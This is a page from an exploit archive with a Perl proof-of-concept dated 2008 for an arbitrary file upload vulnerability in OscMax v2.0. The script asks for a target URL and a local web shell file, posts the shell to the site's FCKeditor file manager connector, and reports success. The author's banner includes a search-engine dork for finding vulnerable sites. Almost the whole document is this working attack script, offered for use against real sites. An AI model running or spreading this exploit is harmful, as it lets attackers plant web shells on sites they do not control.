Home / exploitsPDF  

oscmax-upload.txt

Posted on 24 September 2008

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<START;
in the wild...
########################################################
#OscMax v2.0 Arbitrary File Upload Vulnerability       #
#                                                      #
#By:  e.wiZz!                                          #
#Site: infected.blogger.ba                             #
#Info: Bosnian Idiot FTW!                              #
#Greetz: suN8Hclf,str0ke,najjaci.net                   #
#Dork: "powered by oscmax v2.0" 69 800 :)              #                                                 #
########################################################
########################################################
START
print "Enter URL(http://inthewild.xxx): ";
chomp(my $url=<STDIN>);

print "Localpath of shell(C:/whatever): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'FCKeditor/editor/filemanager/browser/default/connectors/test.html',
Content_Type => 'form-data',
Content      => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!
"; }
else { print "Failed!
"; }
} else { print "No site tho!
"; }
exit;

 

TOP

Malware :

Exploits :